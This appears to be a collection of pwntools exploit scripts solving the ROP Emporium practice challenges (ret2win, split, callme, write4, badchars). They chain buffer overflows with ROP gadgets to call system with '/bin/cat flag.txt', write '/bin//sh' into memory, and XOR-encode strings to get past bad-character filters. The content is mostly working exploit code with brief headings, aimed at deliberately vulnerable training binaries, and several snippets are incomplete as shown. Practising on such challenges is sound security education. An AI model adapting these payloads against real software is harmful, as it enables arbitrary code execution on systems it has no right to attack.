Change the function return address.
from pwn import *
elf = ELF('./ret2win32')
io = gdb.debug('./ret2win32', 'b main')
io.sendline(cyclic(44) + p32(elf.sym['ret2win']))
from pwn import *
elf = ELF('./ret2win')
io = process('./ret2win')
io = gdb.debug('./ret2win', 'b*pwnme+109')
io.sendline(cyclic(40) + p64(0x40053e) + p64(elf.sym['ret2win']))
Call system()
with cat flag.txt
from pwn import *
# rabin2 -z split32
# 000 0x00001030 0x0804a030 17 18 (.data) ascii /bin/cat flag.txt
# gdb
# usefulFunction address: 0x08048657
payload = b'A'*44 + p32(0x8048657) + p32(0x804a030)
io = process('./split32')
print(io.recvuntil('> '))
from pwn import *
# ROPgadget
# 0x0000000000400883 : pop rdi ; ret
# rabin2 -z
# 000 0x00001060 0x00601060 17 18 (.data) ascii /bin/cat flag.txt
# address of usefulFunction: 0x400807
payload = b'A'*40 + p64(0x400883) + p64(0x601060) + p64(0x400810)
r = process('./split')
r.recvuntil('> ')
Call three different functions with three different arguments.
from pwn import *
# ROPgadget
# 0x08048576 : add esp, 8 ; pop ebx ; ret
# 0x080488a9 : pop esi ; pop edi ; pop ebp ; ret
payload = b'A'*44
# 0x080485c0 callme_one@plt
# 0x08048620 callme_two@plt
# 0x080485b0 callme_three@plt
payload += p32(0x080485c0) + p32(0x08048576) + p32(0x01) + p32(0x02) + p32(0x03)
payload += p32(0x08048620) + p32(0x08048576) + p32(0x01) + p32(0x02) + p32(0x03)
payload += p32(0x080485b0) + p32(0x08048576) + p32(0x01) + p32(0x02) + p32(0x03)
# io = gdb.debug('./callme32','b main')
io = process('./callme32')
print(io.recvuntil('> '))
from pwn import *
payload = b'A'*40
# ROPgadget
# 0x401ab0 : pop rdi ; pop rsi ; pop rdx ; ret
# 0x4017d9 : ret
# rabin2 -s
# callme_one: 0x401850
# callme_two: 0x401870
# callme_three: 0x401810
payload += p64(0x4017d9)
payload += p64(0x401ab0) + p64(1) + p64(2) + p64(3) + p64(0x401850)
payload += p64(0x401ab0) + p64(1) + p64(2) + p64(3) + p64(0x401870)
payload += p64(0x401ab0) + p64(1) + p64(2) + p64(3) + p64(0x401810)
# io = gdb.debug('./callme', 'b *0x401a56')
io = process('./callme')
Write string to memory and pass it to system()
from pwn import *
io = process('./write432')
p = b'A'*44
p += p32(0x80486da) # pop edi ; pop ebp ; ret
p += p32(0x804a02c) # @ .data + 4
p += b'//sh'
p += p32(0x8048670) # mov dword ptr [edi], ebp ; ret
p += p32(0x80486da) # pop edi ; pop ebp ; ret
p += p32(0x804a028) # @ .data
p += b'/bin'
p += p32(0x8048670) # mov dword ptr [edi], ebp ; ret
p += p32(0x804865a) # system
p += p32(0x804a028) # @ .data
from pwn import *
io = process('./write4')
p = b'A'*40
p += p64(0x400890) # pop r14 ; pop r15 ; ret
p += p64(0x601050) # @ .data
p += b'/bin//sh'
p += p64(0x400820) # mov qword ptr [r14], r15 ; ret
p += p64(0x400893) # pop rdi ; ret
p += p64(0x601050) # @ .data
p += p64(0x400810) #4005e0) # @ system@plt
Some characters are not allowed (xor to store data, xor to get it back while in memory).
from pwn import *
payload = b'A'*40 # offset
print_file = p64(0x7ffff7dc7a07)
writeable = 0x7ffff7ba5000
# write to memory
pop_r12_r13_r14_r15 = p64(0x40069c)
mov_r13_r12 = p64(0x400634)
pop_rdi = p64(0x4006a3)
payload += pop_r12_r13_r14_r15 + b'flbh/tyt' + p64(writeable) + p64(1) + \
p64(writeable+2) + mov_r13_r12 + pop_rdi + p64(writeable)
# introducing bad chars
pop_r15 = p64(0x4006a2)
sub_r15_r14 = p64(0x400630)
payload += sub_r15_r14
payload += pop_r15 + p64(writeable+3) + sub_r15_r14
payload += pop_r15 + p64(writeable+4) + sub_r15_r14
payload += pop_r15 + p64(writeable+6) + sub_r15_r14
# print file contents
payload += print_file
# io = gdb.debug('./badchars', 'b *pwnme+268')
io = process('./badchars')
from pwn import *
# 0x80485bb : pop ebp ; ret
# 0x804839d : pop ebx ; ret
# 0x8048543 : add BYTE PTR [ebp+0x0], bl
# offset for overflow
payload = b'A'*44
# write filename to memory
# 0x80485b9 : pop esi ; pop edi ; pop ebp ; ret
# 0x804854f : mov dword ptr [edi], esi ; ret
writeable = 0x804a032
# we can't store the "flag.txt" string on the stack
# because the stack is used by fopen and the string
# gets modified
payload += p32(0x80485b9) + b'ci^d' + p32(writeable) + b'BBBB' + p32(0x804854f)
payload += p32(0x80485b9) + b'+quq' + p32(writeable+4) + b'BBBB' + p32(0x804854f)
# xoring the filename in memory
for i in range(8):
payload += p32(0x80485bb) + p32(writeable+i)
payload += p32(0x804839d) + p32(3)
payload += p32(0x8048543)
# reading and displaying file contents
print_file = 0xf7fc87cf
payload += p32(print_file) + b'BBBB' + p32(writeable)
# io = gdb.debug('./badchars32', 'b*pwnme+273')
# io = gdb.debug('./badchars32', 'b*print_file+38')
io = process('./badchars32')